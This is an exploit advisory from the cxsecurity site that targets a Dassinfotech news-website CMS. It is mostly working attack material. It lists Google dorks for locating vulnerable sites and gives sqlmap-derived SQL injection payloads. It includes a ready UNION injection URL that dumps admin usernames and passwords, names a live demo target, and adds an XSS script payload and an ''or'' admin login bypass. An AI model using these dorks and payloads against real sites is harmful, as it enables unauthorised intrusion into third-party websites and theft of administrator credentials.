News website CMS SQL injection & Bypass Admin Panel & XSS Vulnerability & Remote code Execution By Aryan Chehreghani

2020.06.05
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + Exploit Title: News website CMS SQL injection & Bypass Admin Panel && XSS Vulnerability By Aryan Chehreghani + Date: 2020-06-05 + Vendor Homepage: https://www.dassinfotech.com + Auxiliary software : http://sqlmap.org + Exploit Author : Aryan Chehreghani | Ictus_TM + Dork CVE: CVE-2019-13409 + Dork CWE : CWE-89 + Version: All Version + Tested on: win,linux,mac ########################################################################################################################### + Dork 1 : intext:Design by Dassinfotech.com + Dork 2 : inurl:detailsnews.php?id= + Dork 3 : intext:Design by Dassinfotech.com inurl:detailsnews.php?id= + Dork 4 : inurl:php?id= intext:Design By Dassinfotech.com ########################################################################################################################### [SQL injection] [+] Method ( Sql injection ) Ictus Security Team of Iran [+] parameter : id = latestnews.php?catid=25 ########################################################################################################################### [+] Testing Method: [+] - UNION query __________SQLMAP__________result : ||||||||||||||||||||||| Parameter: sec (GET) || ||||||||||||||||||||||| arameter: catid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: catid=15' AND 6574=6574 AND 'RCcd'='RCcd Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: catid=15' AND (SELECT 9314 FROM (SELECT(SLEEP(5)))mkCY) AND 'rCId'= 'rCId Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: catid=15' UNION ALL SELECT CONCAT(0x716b767171,0x6c746c51566743754d 72706e67777068776f58415443736f62786f4d716448795a6b56744f664a61,0x716a6a7071),NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL-- - ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++| [+]Using Sqlmap Example : sqlmap -u http://target.com/latestnews.php?catid=25 --dbs ========================================================================| Exploit ==> latestnews.php?catid=-23%27%20union%20select%201,2,3,4,5,6,7,group_concat(userid,Password),9,10,11,12,13,14,15,16,17,18,19%20fRom%20admin--%20- ========================================================================| Demo: [+] http://ncrlife.in/latestnews.php?catid=25[SQL] ========================================================================| [XSS Vulnerability] [+] Method :"><script>alert('Aryan Chehreghani | Ictus_TM')</script><" [+] Type Code IN search Value / some Value +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [Bypass Admin panel] [+] Payload U / P : '=''or' / '=''or' [+]Login Pages : victim.com/matri/login.php victim.com/india/login.php +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [=] T.me/Clvsornapv [=] Telegram Channel ==> T.me/Ictus_TM


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top